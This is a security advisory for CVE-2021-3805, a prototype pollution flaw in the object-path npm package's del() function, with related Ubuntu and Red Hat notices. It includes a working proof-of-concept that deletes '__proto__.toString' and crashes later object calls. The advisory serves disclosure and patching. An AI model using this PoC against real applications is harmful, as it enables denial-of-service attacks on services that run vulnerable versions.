Headline
CVE-2021-3805: Prototype Pollution in object-path
object-path is vulnerable to Improperly Controlled Modification of Object Prototype Attributes (‘Prototype Pollution’)
Description
object-path package is vulnerable to Prototype Pollution. The del() function fails to validate which Object properties it deletes. This allows attackers to modify the prototype of Object, causing the modification of default properties like toString on all objects.
Proof of Concept
Create the following PoC file:
// PoC.js
const objectPath = require('object-path');
console.log("Before : " + ({}).toString());
objectPath.withInheritedProps.del({}, '__proto__.toString');
console.log("After : " + ({}).toString());
Execute the following commands in the terminal:
npm i object-path # Install affected module
node poc.js # Run the PoC
Check the Output:
Before : [object Object]
console.log("After : " + ({}).toString());
^
TypeError: {}.toString is not a function
Impact
Affected versions of this package are vulnerable to Denial of Service (DoS) via the del function.
Related news
Ubuntu Security Notice 5967-1 - It was discovered that the set method in object-path could be corrupted as a result of prototype pollution by sending a message to the parent process. An attacker could use this issue to cause object-path to crash.
Red Hat Advanced Cluster Management for Kubernetes 2.3.3 General Availability release images, which fix bugs, provide security fixes, and update container images. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE links in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2021-3805: nodejs-object-path: prototype pollution vulnerability * CVE-2021-23017: nginx: Off-by-one in ngx_resolver_copy() when labels are followed by a pointer to a root domain name * CVE-2021-23434: object-path: Type confusion vulnerability can lead to a bypass of C...